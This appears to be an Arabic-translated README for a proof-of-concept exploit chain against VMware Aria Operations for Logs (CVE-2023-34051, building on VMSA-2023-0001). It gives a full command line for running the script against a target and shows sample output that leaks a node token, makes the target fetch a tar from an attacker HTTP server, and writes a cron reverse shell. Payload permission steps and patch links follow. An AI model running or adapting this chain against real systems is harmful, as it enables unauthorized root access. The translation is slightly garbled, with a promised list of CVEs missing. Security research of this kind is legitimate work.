
VMware Aria لعمليات السجلات CVE-2023-34051
CVE-2023-34051 هو تجاوز للمصادقة يتجاوز التصحيح لـ VMSA-2023-0001. يتضمن VMSA-2023-0001 لـ vRealize Log Insight الثغرات التالية:
يقوم التكوين الافتراضي لهذه الثغرة بكتابة مهمة cron لإنشاء شل عكسي.
تأكد من تغيير ملف payload ليتناسب مع بيئتك.
يمكن العثور على تحليل جذري فني للثغرة في مدونتنا: https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive
لتحليل مثيلات Log Insight بحثًا عن مؤشرات الاختراق، راجع مدونة IOC الخاصة بنا: https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/
يستغل هذا الدليل (POC) تزوير عنوان IP ونقاط نهاية Thrift RPC المختلفة لتحقيق كتابة ملف عشوائية.
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
لكي ينجح هذا الهجوم، يجب أن يكون لدى المهاجم نفس عنوان IP الخاص بالعقدة الرئيسية/العاملة. راجع المدونة أعلاه لمزيد من التفاصيل.
في حالة استخدام حمولة تعتمد على cron، تأكد من أن ملف الحمولة لديه الأذونات والمالك المناسبين:
sudo chown root:root payload
sudo chmod 0644 payload
قم بالتحديث إلى أحدث إصدار أو خفف المخاطر باتباع التعليمات الواردة في VMSA https://www.vmware.com/security/advisories/VMSA-2023-0021.html
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. يُرجى الاستخدام بمسؤولية.